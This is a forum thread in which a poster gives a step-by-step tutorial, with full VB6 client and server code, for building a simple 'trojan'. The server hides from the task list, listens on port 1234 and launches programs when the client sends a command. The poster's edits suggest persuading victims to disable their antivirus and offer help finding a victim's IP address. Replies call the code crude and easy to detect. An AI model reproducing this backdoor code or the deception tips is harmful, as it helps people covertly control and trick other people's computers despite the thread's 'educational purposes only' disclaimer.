How to make your own trojan EDUCATIONAL PURPOSES ONLY menu

User Tag List

Results 1 to 6 of 6
  1. #1
    Liquid Malfunction's Avatar Banned
    Reputation
    53
    Join Date
    Sep 2008
    Posts
    521
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    How to make your own trojan EDUCATIONAL PURPOSES ONLY

    EDUCATIONAL PURPOSE ONLY I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS INFO(had to include all this **** so somebody doesn't come back to me crying)also you need VB 6

    1.to make a trojan horse we need to create two files a Server and a Client

    2.Open VB 6 and open a standard exe (its a VB thing)

    3.now first we need to Add 1 textbox and 3 command buttons to the form.

    4.Change text of Textbox1 to 127.0.0.1 and set Alignment to Center

    5.Change the caption of command button 1 to ?connect?

    6.change the caption of command button 2 to ?open msn?

    7.Change the caption of command button 3 to ?open explorer?

    8.Ok now we are going to add the Winsock.ocx by right clicking on the toolbox and clicking components to add the microsoft winsock control 6.0 (SP6)
    And add the winsock control to your project

    9.Now we are going to code for the client

    10.Double click on the connect button to open the code size and add the following code

    11.
    Code:
    Private Sub Command1_Click()
    Winsock1.RemoteHost = Text1.Text
    Winsock1.RemotePort = 1234
    Winsock1.Connect
    End Sub
    
    Private Sub Command2_Click()
    Winsock1.SendData "msn"
    End Sub
    
    Private Sub Command3_Click()
    Winsock1.SendData "ex"
    End Sub
    
    Private Sub Winsock1_Close()
    Winsock1.Close
    End Sub
    
    Private Sub Winsock1_Connect()
    Form1.Caption = "Connected To " & Text1.Text
    End Sub
    12.That is all for the client now save the project and start up VB again

    13.Now we are going to create the Server

    14.Start a new standard exe

    15.On this form we are only going to add the winsock.ocx control

    16.
    Code:
    Private Sub Form_Load()
    App.TaskVisible = False ?to make the server unvisible to Ctrl Alt Del
    Me.Hide ?hide the Form when load
    If App.PrevInstance = True Then
    Unload Me ?if the App ir allready running close the App
    End If
    Winsock1.LocalPort = 1234
    Winsock1.Listen ?let the server listen on port 1234 for you to connect
    End Sub
    
    Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
    If Winsock1.State <> sckClosed Then Winsock1.Close
    Winsock1.Accept requestID
    End Sub
    
    
    
    Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
    Dim data As String
    Winsock1.GetData data
    
    If data = "msn" Then
    On Error Resume Next
    ?open msn messenger on the server side
    Shell ("C:\Program Files\MSN Messenger\msnmsgr.exe")
    Shell ("C:\Program\MSN Messenger\msnmsgr.exe")
    End If
    
    If data = "ex" Then
    On Error Resume Next
    ?open explorer on the server side
    Shell ("C:\Program Files\Internet Explorer\IEXPLORE.EXE")
    Shell ("C:\Program\Internet Explorer\IEXPLORE.EXE")
    End If
    
    End Sub
    17.Enjoy BUT DON'T USE IT


    EDIT:also you need to know the victims ip address but this is easy to find if you got any questions on finding ips PM me

    EDIT:there is reason I said this is not to be used but i'm pretty sure you could go all "please disable your antivirus before download so the download can finish"
    Last edited by Liquid Malfunction; 11-12-2008 at 08:43 AM.

    How to make your own trojan EDUCATIONAL PURPOSES ONLY
  2. #2
    Clain's Avatar Banned
    Reputation
    179
    Join Date
    Jan 2008
    Posts
    1,396
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Errrrr a trojan in VB would be picked up by... well even windows defender!

  3. #3
    ugly_rocket's Avatar Active Member
    Reputation
    17
    Join Date
    Nov 2007
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    what does this trojan specifically do?

  4. #4
    Mirror's Avatar Contributor
    Reputation
    259
    Join Date
    Nov 2006
    Posts
    2,602
    Thanks G/R
    0/0
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Well if you read the code, it says it makes it impossible to use CTRL+ALT+DLT and it ****s up your MSN, and your Windows Explorer.
    THIS SIGNATURE IS IN VIALOATION OF SITE RULES, PLEASE FIX ME!
    -Fault

  5. #5
    Liquid Malfunction's Avatar Banned
    Reputation
    53
    Join Date
    Sep 2008
    Posts
    521
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Mirror View Post
    Well if you read the code, it says it makes it impossible to use CTRL+ALT+DLT and it ****s up your MSN, and your Windows Explorer.
    Oh and if you guys didn't know windows explorer is the thing that shows you icons on your desktop and your task bar.This trojan is more for the lolz then serious hacking

  6. #6
    Mirror's Avatar Contributor
    Reputation
    259
    Join Date
    Nov 2006
    Posts
    2,602
    Thanks G/R
    0/0
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It would be easy to stop it though lol.

    Oh btw windows explorer is the thing showing your task bar, pretty everything graphic, so your screwed. lol

    But you could always just go to Task Manager, then end process explorer.exe lol, tell them to do that and same thing happens XD
    THIS SIGNATURE IS IN VIALOATION OF SITE RULES, PLEASE FIX ME!
    -Fault

Similar Threads

  1. LF Some1 Who knows how to make your own UI
    By BrightChild in forum WoW UI, Macros and Talent Specs
    Replies: 4
    Last Post: 10-30-2007, 06:50 PM
  2. How to make your own items!!!
    By Ben090 in forum WoW EMU Guides & Tutorials
    Replies: 1
    Last Post: 09-26-2007, 01:08 AM
  3. How to make your own items!!!
    By Ben090 in forum WoW EMU Guides & Tutorials
    Replies: 13
    Last Post: 09-18-2007, 07:14 PM
  4. WoW Emu Section (How to Make Your Own WoW Server)
    By Errage in forum Suggestions
    Replies: 8
    Last Post: 08-21-2007, 11:53 PM
  5. [Easy] How to Make Your Own WoW Forum Avatar!
    By Roflcopterzzz in forum Art & Graphic Design
    Replies: 21
    Last Post: 05-28-2007, 10:09 AM
All times are GMT -5. The time now is 10:24 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search